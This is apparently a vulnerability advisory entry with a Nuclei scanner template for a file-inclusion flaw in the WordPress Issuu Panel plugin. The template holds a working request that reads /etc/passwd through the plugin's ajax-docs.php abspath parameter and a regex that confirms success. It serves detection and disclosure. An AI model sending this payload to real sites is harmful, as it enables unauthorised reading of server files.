issuu-panel-lfi: Wordpress Plugin Issuu Panel Remote/Local File Inclusion

日期: 2025-08-01 | 影响软件: Issuu Panel | POC: 已公开

漏洞描述

The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.

PoC代码[已公开]

id: issuu-panel-lfi

info:
  name: Wordpress Plugin Issuu Panel Remote/Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
  reference:
    - https://cxsecurity.com/issue/WLB-2016030131
    - https://wordpress.org/plugins/issuu-panel/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wp-plugin,wordpress,lfi,rfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207464119a8f17a8c293416fb6b97ff82b3a1de2aac83aa0710d64cf4edef75c14022100925ef5f5b9441eb9df4e464cdbffa431b9ac19695cba1048c684b09d083578d2:922c64590222798bb761d5b6d8e72950